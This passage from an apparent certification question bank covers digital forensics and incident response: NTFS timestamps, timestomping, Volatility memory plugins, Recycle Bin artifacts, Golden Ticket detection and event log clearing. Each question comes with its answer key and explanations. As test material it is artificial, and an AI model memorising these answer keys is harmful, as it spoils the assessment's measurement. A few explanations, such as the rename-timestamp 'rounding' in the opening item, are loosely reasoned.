B.The $FILE_NAME modified timestamp is updated when the file's content changes, and the $STANDARD_INFORMATION modified timestamp is updated only on rename operations.
C.The file's content was modified at 10:00:00, and the $FILE_NAME timestamp was not updated because the file was not renamed.
D.The file was renamed at 09:54:00, which updated the $FILE_NAME timestamp to 09:55:00, and then the content was modified at 10:00:00, updating only the $STANDARD_INFORMATION timestamp.
AnswerD

A rename operation updates the $FILE_NAME attribute timestamps, including the modified time, to the time of the rename. The USN journal shows a rename at 09:54:00, but the $FILE_NAME modified timestamp is 09:55:00, which could reflect a slight delay or rounding. Later, at 10:00:00, the file's content was modified, updating the $STANDARD_INFORMATION modified timestamp. This sequence explains the 5-minute gap and is consistent with NTFS behavior.

Why this answer

A rename operation updates the $FILE_NAME attribute timestamps, including the modified time. Later, a content modification updates the $STANDARD_INFORMATION modified timestamp. The 5-minute difference is consistent with a rename at approximately 09:54-09:55, followed by a content modification at 10:00.

The USN journal entry corroborates the rename event.

Exam trap

The trap here is confusing which timestamps are updated by rename versus content modification; the $FILE_NAME modified timestamp changes on rename, while the $STANDARD_INFORMATION modified timestamp changes on content modification.

60
MCQmedium

An investigator notices that a file's 'Birth' time is later than its 'Modification' time. What is the most likely forensic explanation for this phenomenon?

A.The file system is corrupted
B.The file was copied from an external source
C.The system clock was updated via NTP
D.The file is a system-level shadow copy
AnswerB

When copying a file, the OS creates a new entry on the destination volume, setting a new birth time. However, many copy utilities and APIs preserve the original modification timestamp from the source file. This results in the metadata anomaly where the file appears to be 'modified' before it was 'born'.

Why this answer

This scenario, often called 'time-traveling' files, typically occurs when a file is copied from another location. The copy process assigns a new 'Birth' time (the time of the copy), but the 'Modification' time is often preserved from the original source file. Recognizing this artifact is crucial for distinguishing between files created locally and those that were moved or copied by an attacker into the environment during an incident.

Exam trap

Candidates often assume the file is corrupted or the system clock is broken, failing to recognize the 'time-traveling' artifact common when files are copied from external sources.

61
MCQmedium

An analyst is reviewing a memory image from a Windows server and needs to identify kernel drivers that were loaded but are not present in the list of modules on disk. The analyst runs the Volatility 3 windows.modules plugin and compares the output to a baseline of known-good drivers. Which additional plugin should the analyst run to detect drivers that have been unlinked from the kernel module list but whose code may still be resident in memory?

A.windows.callbacks
B.windows.svcscan
C.windows.ldrmodules
D.windows.driverscan
AnswerD

windows.driverscan scans pool memory for DRIVER_OBJECT structures rather than walking the linked list of loaded modules, so it can surface drivers that have been unlinked from PsLoadedModuleList but whose objects remain allocated. This directly addresses the requirement of finding drivers missing from the on-disk module list and provides a cross-check against the modules plugin output.

Why this answer

A driver unlinked from PsLoadedModuleList will not appear in the modules plugin output, but its DRIVER_OBJECT may still reside in pool memory. The driverscan plugin locates these objects by scanning pool memory, making it the appropriate cross-check for detecting hidden or unlinked kernel drivers in the image.

Exam trap

The trap here is assuming that the modules plugin provides a complete inventory of loaded kernel drivers, when a rootkit can unlink a driver from the module list while leaving its code and objects intact.

62
MCQeasy

A forensic analyst is reviewing a compromised Windows 10 host and finds a file named 'lsass.exe' in the C:\Windows\Temp directory. The file has a creation timestamp that coincides with the suspected intrusion time. The analyst wants to determine if this file is a malicious copy of the legitimate Windows process. Which characteristic of the legitimate lsass.exe should the analyst verify first to confirm the file is suspicious?

A.The file's digital signature and its original location in C:\Windows\System32
B.The file's hash against a threat intelligence database like VirusTotal
C.The file's access control list (ACL) to see if permissions were modified
D.The file's size and version information compared to the known-good lsass.exe
AnswerA

The legitimate lsass.exe resides in C:\Windows\System32 and is digitally signed by Microsoft. A copy in C:\Windows\Temp is highly suspicious because system processes do not normally run from temporary directories. Verifying the digital signature and original location quickly confirms whether the file is the genuine Windows component or a masquerading malicious binary, making this the most direct first check.

Why this answer

Legitimate Windows system executables like lsass.exe are stored in C:\Windows\System32 and are digitally signed by Microsoft. A copy found in C:\Windows\Temp is almost certainly malicious or a decoy. Verifying the digital signature and original location is a quick, offline method to confirm the file is not the genuine system process.

Other checks like hash lookups or ACL review are useful but less immediate and definitive for this specific masquerading scenario.

Exam trap

The trap here is relying on file size or hash lookups first, when the most obvious indicator is the unexpected directory combined with an invalid or missing Microsoft signature.

63
MCQhard

An examiner is reviewing an APFS volume from a macOS 13 system. Using a timeline tool that parses APFS metadata, the analyst observes a file whose inode has an added date (birth time) earlier than its modified time, and the file's data stream shows a sparse extent. The case requires establishing the earliest credible creation time for the file. Which APFS attribute should the analyst rely on as the file's creation time?

A.The volume superblock's last modification time for the APFS container
B.The data stream's first extent allocation timestamp in the APFS space manager
C.The extended attribute com.apple.metadata:kMDItemFSCreationDate stored on the file
D.The inode's added time (crtime) stored in the APFS inode structure
AnswerD

APFS records a birth/added timestamp (crtime) in the inode, which represents when the file system object was created. It is the closest analog to NTFS $STANDARD_INFORMATION creation time and is the authoritative creation timestamp on APFS. Because APFS is copy-on-write and stores this value in the inode, parsing it directly yields the earliest credible creation time for the file, independent of later modifications.

Why this answer

APFS stores a dedicated birth timestamp in each inode, commonly surfaced as added time or crtime, which records when the object was created. This value is maintained by the file system itself and is the correct attribute for establishing a file's creation time. Container-level times and Spotlight extended attributes describe broader or user-space state and can be misleading, while allocation extents reflect block assignment rather than object creation.

Exam trap

The trap here is treating Spotlight metadata or allocation extents as creation evidence instead of the APFS inode's added time.

64
MCQmedium

An examiner captures a memory image from a live system while a malicious process is active. Upon analysis using Volatility, the examiner notes that the process environment block (PEB) displays a different path for the executable than the one found in the VAD tree. Which artifact is likely being manipulated?

A.The Master File Table (MFT) entry
B.The Thread Environment Block (TEB)
C.The process structures in memory
D.The System Service Descriptor Table (SSDT)
AnswerC

Process hollowing involves creating a legitimate process in a suspended state and replacing its memory contents. The operating system maintains the PEB for legacy application compatibility, but the VAD tree manages the actual memory ranges mapped to the process. Mismatches here are a hallmark of process injection.

Why this answer

Discrepancies between the PEB and the Virtual Address Descriptor (VAD) tree often indicate process hollowing or replacement. Malware frequently updates the PEB image path to masquerade as legitimate system services while the VAD tree reflects the actual memory mapping of the injected code. Identifying this mismatch is critical for uncovering stealthy code injection techniques that bypass simple process listing tools by hiding the true origin of the executable.

Exam trap

Test-takers often misattribute PEB and VAD tree discrepancies to simple file corruption or benign application updates rather than recognizing advanced process hollowing techniques.

65
MCQeasy

A digital forensics examiner is analyzing a memory dump from a Windows 7 system using Volatility 3. The examiner wants to identify all network connections that were active at the time of the capture, including the process responsible for each connection. Which Volatility 3 plugin should the examiner use to achieve this goal?

A.windows.netscan
B.windows.sockets
C.windows.netstat
D.windows.connections
AnswerA

The windows.netscan plugin scans for network artifacts in memory, including TCP and UDP endpoints, and associates them with the owning process. It is designed to work across Windows versions and provides details such as local and remote addresses, ports, and process IDs. This directly meets the examiner's requirement to identify active network connections and their responsible processes.

Why this answer

The windows.netscan plugin in Volatility 3 is specifically designed to scan memory for network connection structures and correlate them with owning processes. It provides a comprehensive view of active TCP and UDP endpoints, including local and remote addresses, ports, and process IDs. Other plugin names listed are either non-existent or less reliable, making windows.netscan the correct choice for this task.

Exam trap

The trap here is assuming that a plugin named windows.netstat, similar to the live netstat command, is the best choice, when in fact windows.netscan is the Volatility 3 standard for memory-based network artifact recovery.

66
MCQhard

An examiner is analyzing a Windows memory image and wants to determine whether a specific kernel driver was loaded and then unloaded during the system's uptime. Which approach is most appropriate?

A.Check the system event log for a service control manager entry indicating the driver was started.
B.Search for the driver's pool tags and compare them against the current loaded module list to identify remnants of an unloaded driver.
C.Examine the registry hives in memory for the driver's service key and confirm its start type.
D.Run windows.modules and check whether the driver appears in the output.
AnswerB

Unloaded drivers can leave pool allocations and pool tags in memory even after their module entry is removed. Searching for the driver's known pool tags and comparing against the current module list can reveal remnants indicating the driver was present earlier. This technique leverages memory artifacts that persist beyond the driver's active lifetime, providing evidence of prior loading.

Why this answer

Pool tags and residual pool allocations can persist after a driver unloads, so searching for a driver's known pool tags and comparing against the current module list can reveal that it was loaded earlier. The module list itself only shows current modules, registry keys show configuration, and event logs are not reliable for this purpose in memory forensics.

Exam trap

The trap here is relying on the current module list or registry configuration to answer a historical question about whether a driver was ever loaded.

67
MCQhard

An investigator is examining an NTFS volume from a system that was abruptly powered off during a malware installation. The analyst observes that the MFT contains a file record for a suspicious executable with a valid $DATA attribute, but the file is not visible in the directory index. Which NTFS artifact should the analyst examine to determine whether the file record was orphaned due to an interrupted transaction?

A.The $Secure:$SDS stream, which stores security descriptors and would show if the file's permissions were applied during creation.
B.The $UsnJrnl:$J, which records all file system changes and would show the file creation event even if the directory index was not updated.
C.The $Bitmap, which tracks cluster allocation and would indicate whether the file's clusters were allocated before the power loss.
D.The $LogFile, which contains redo and undo records that can show incomplete metadata transactions from the power loss.
AnswerD

$LogFile is a write-ahead log that records metadata transactions before they are committed to the MFT. After a power loss, it can contain redo and undo records for incomplete operations, such as a file creation that updated the MFT but not the parent directory index. Examining $LogFile can reveal whether the orphaned record resulted from an interrupted transaction.

Why this answer

$LogFile is the NTFS write-ahead journal that ensures metadata consistency. It records redo and undo information for transactions. After an abrupt power loss, incomplete transactions may leave the MFT updated but the directory index not, producing an orphaned file record.

Analyzing $LogFile can reveal the interrupted operation and help reconstruct the intended state.

Exam trap

The trap here is assuming the USN journal or $Bitmap can explain transaction interruption, when only $LogFile contains the redo/undo records needed to analyze incomplete metadata operations.

68
MCQmedium

During a forensic investigation of a Windows 10 workstation, an analyst reviews the NTFS Master File Table (MFT) and notices that the $STANDARD_INFORMATION timestamps for a suspicious file are all dated 2023-08-15, but the $FILE_NAME timestamps are dated 2024-01-20. The file is located in C:\Users\Public\Downloads. Which of the following best explains this discrepancy?

A.The file system journal ($LogFile) recorded a system time change, causing the $STANDARD_INFORMATION timestamps to be adjusted while the $FILE_NAME timestamps remained unchanged.
B.The file was likely timestomped, as the $STANDARD_INFORMATION timestamps can be modified by user-mode tools while $FILE_NAME timestamps are harder to alter.
C.The file was copied from another NTFS volume, causing the $STANDARD_INFORMATION timestamps to reflect the original creation time while the $FILE_NAME timestamps reflect the copy time.
D.The file was restored from a backup, and the backup software restored the $STANDARD_INFORMATION timestamps but not the $FILE_NAME timestamps.
AnswerB

This is correct because timestomping tools typically modify the $STANDARD_INFORMATION attributes, which are easily accessible, while the $FILE_NAME timestamps in the MFT are less commonly altered. The discrepancy between the two sets of timestamps is a classic indicator of timestomping, especially when the $STANDARD_INFORMATION times are earlier than the $FILE_NAME times.

Why this answer

The correct answer is the option describing timestomping. In NTFS, $STANDARD_INFORMATION timestamps are easily modified by user-mode APIs, while $FILE_NAME timestamps are stored in the MFT and are more difficult to change. A large discrepancy where $STANDARD_INFORMATION times are earlier than $FILE_NAME times is a strong indicator of timestomping, often used by attackers to hide malicious files.

Exam trap

The trap here is assuming that any timestamp discrepancy is due to benign system activity, when in fact it often indicates deliberate timestomping.

69
MCQmedium

An analyst is examining a Windows 10 system and finds a suspicious file in the Recycle Bin. The analyst wants to determine the original path of the file before it was deleted. Which artifact should the analyst examine to find the original file path and deletion time?

A.INFO2 file
B.$Recycle.Bin folder
C.$I file
D.$R file
AnswerC

The $I file is a metadata file created alongside the $R file (which contains the actual deleted data) when a file is deleted to the Recycle Bin. It stores the original file path, the deletion timestamp, and the file size. Examining the $I file provides the original path and deletion time, directly answering the analyst's question.

Why this answer

In Windows 10, each deleted file in the Recycle Bin has a corresponding $I file that stores the original path, deletion time, and file size. The $R file contains the actual data. The $Recycle.Bin folder is the container, and INFO2 is obsolete.

Therefore, the $I file is the correct artifact to examine.

Exam trap

The trap here is assuming that the $R file contains metadata, when in fact it only holds the file content, and the metadata is in the separate $I file.

70
MCQhard

You are examining a Windows 10 host and find a scheduled task whose XML action launches 'rundll32.exe' with the argument 'C:\ProgramData\Microsoft\Crypto\RSA\logon.dll,Register'. The task's author is a domain user who has never logged on to this machine, and the DLL has a creation timestamp matching the suspected intrusion window. Which assessment is best supported?

A.This is a benign logon script registered by Group Policy for the domain user.
B.This indicates a misconfigured application installer that ran as the wrong domain account.
C.This is a legitimate Windows cryptographic component and should be excluded from the investigation.
D.This is a persistence mechanism using a masqueraded path and an export invoked via rundll32.
AnswerD

Attackers frequently place DLLs in plausible-looking system directories and register them through rundll32 by export name so the payload executes inside a signed Microsoft binary. The author being a domain user who never logged on locally, combined with the DLL creation time matching the intrusion window, strongly supports a persistence mechanism rather than legitimate software installation.

Why this answer

Scheduled tasks that invoke rundll32 against a DLL export located in a user-writable directory are a well-known persistence technique because the signed Microsoft binary performs the loading and evades naive process-name detection. The combination of an author account with no local logon history and a DLL creation timestamp inside the intrusion window confirms this is attacker-planted rather than legitimate cryptographic or installer activity.

Exam trap

The trap here is seeing the word 'Crypto' in the path and assuming the DLL is a legitimate Windows cryptographic component, when the path is only a plausible-looking masquerade.

71
Multi-Selectmedium

An enterprise incident response team is preparing to conduct a forensic investigation on a compromised Linux server. The server is still running and cannot be taken offline. Which TWO of the following commands are appropriate for collecting volatile network connection information while minimizing disruption to the system? (Choose two.)

Select 2 answers
A.nmap -sS 127.0.0.1
B.netstat -antp
C.lsof -i
D.ss -tulpn
E.tcpdump -i any -w capture.pcap
AnswersB, D

netstat -antp displays active network connections, including TCP and UDP, with process IDs and program names. It is a standard tool for live response and provides a snapshot of current connections. Using the -p flag requires root privileges but is appropriate for forensic collection on a running system without causing disruption.

Why this answer

netstat and ss are standard tools for capturing volatile network connection information on a live Linux system. Both provide details on active connections, listening ports, and associated processes without generating new traffic or causing significant system disruption. They are commonly used in incident response to document the current network state before further analysis.

Exam trap

The trap here is confusing network capture tools like tcpdump with connection enumeration tools, but tcpdump records packets rather than listing current connections with process attribution.

72
MCQeasy

Which NTFS metadata file serves as the index for all files and directories on the volume?

A.$MFT
B.$LogFile
C.$Boot
D.$Volume
AnswerA

The $MFT file is the primary repository for all file metadata. It stores the file name, size, permissions, and data location for every object on the volume. Without the $MFT, the operating system would be unable to locate or manage files, and forensic analysis would be severely hindered.

Why this answer

The Master File Table (MFT) is the central database of an NTFS volume. Every file and directory on the disk has at least one entry in the MFT. Understanding the MFT is the foundation of NTFS forensics, as it contains all the metadata necessary to identify file properties, permissions, and data locations, which are essential for rebuilding the state of the filesystem during an investigation.

Exam trap

Candidates often confuse the Master File Table ($MFT) with individual file records or system logs like $LogFile, failing to recognize that the $MFT itself is the root database indexing every file and directory.

73
MCQmedium

Which indicator is most effective for identifying a 'Golden Ticket' attack during Kerberos-based authentication?

A.Unusually long ticket lifetimes in the Kerberos ticket history.
B.Multiple failed login attempts on a workstation.
C.An increase in web traffic on port 443.
D.The presence of a new user account in Active Directory.
AnswerA

Golden Tickets are often created with extremely long expiration times, sometimes years into the future. Monitoring ticket lifetimes is a highly effective way to identify forged TGTs, as standard Kerberos tickets have strictly enforced, short lifetimes defined by domain policies that a forged ticket would likely bypass or violate.

Why this answer

A Golden Ticket is a forged Kerberos Ticket Granting Ticket (TGT) created with a compromised KRBTGT account hash. Because it is forged, it can grant the attacker unlimited access to any resource in the domain for long periods. Identifying this requires looking for tickets with unusually long lifetimes, or tickets that do not match the standard issuance patterns expected from the domain controller's authentication logs during normal operations.

Exam trap

Candidates look for account lockouts or failed logins, which are not characteristic of Golden Tickets. Golden Tickets use forged credentials, so they appear as legitimate, highly privileged, and persistent authentication.

74
MCQmedium

During an enterprise incident, you discover that an attacker modified the Windows event log service to record only selected events, effectively hiding malicious activity. Which Windows artifact should you analyze first to determine what modifications were made to the logging configuration?

A.The SYSTEM registry hive, specifically the EventLog service key.
B.The NTFS $LogFile for the volume containing the event logs.
C.The Application event log for service control manager events.
D.The Security event log (EVTX) for event ID 1102.
AnswerA

The EventLog service configuration, including which logs are enabled and their file paths, is stored in the SYSTEM registry hive under CurrentControlSet\Services\EventLog. Analyzing this key reveals if an attacker disabled logging or redirected log files. This is the authoritative source for logging configuration changes and should be examined early in the investigation to understand the scope of tampering.

Why this answer

The EventLog service configuration is stored in the SYSTEM registry hive, making it the definitive source for determining if an attacker altered logging settings. Other artifacts like event logs themselves or file system metadata may provide indirect clues, but they do not contain the configuration details needed to identify what was changed. Examining the SYSTEM hive allows responders to see exactly which logs were enabled or disabled.

Exam trap

The trap here is assuming that clearing the Security event log (event ID 1102) is the only way attackers tamper with logging, when in fact they often modify registry-based logging configuration to selectively suppress events.

75
MCQeasy

A Windows 10 endpoint was compromised, and the attacker cleared the Security event log after establishing persistence. You have a memory image captured after the clearing. Which Windows Event Log artifact can still provide evidence of the log-clearing action, even if the Security log entries were wiped?

A.Security log Event ID 1102
B.Application log Event ID 1000
C.System log Event ID 6005
D.System log Event ID 104
AnswerD

When the Windows Event Log service clears a log, it writes Event ID 104 to the System log, recording which log was cleared and by which user. Even if the Security log itself is emptied, this System log entry persists unless the System log is also cleared, making it a reliable indicator of log tampering.

Why this answer

Clearing a log generates Event ID 1102 in the Security log and Event ID 104 in the System log. Because the Security log was erased, the 1102 entry is gone, but the System log's 104 entry usually remains and records the log name and the user who performed the clear. That surviving record is the key artifact for proving anti-forensic activity.

Exam trap

The trap here is reaching for the well-known Security 1102 event; it is written into the log being cleared, so it is destroyed along with it, while the System 104 entry persists.

Page 1 of 4

Page 2

All pages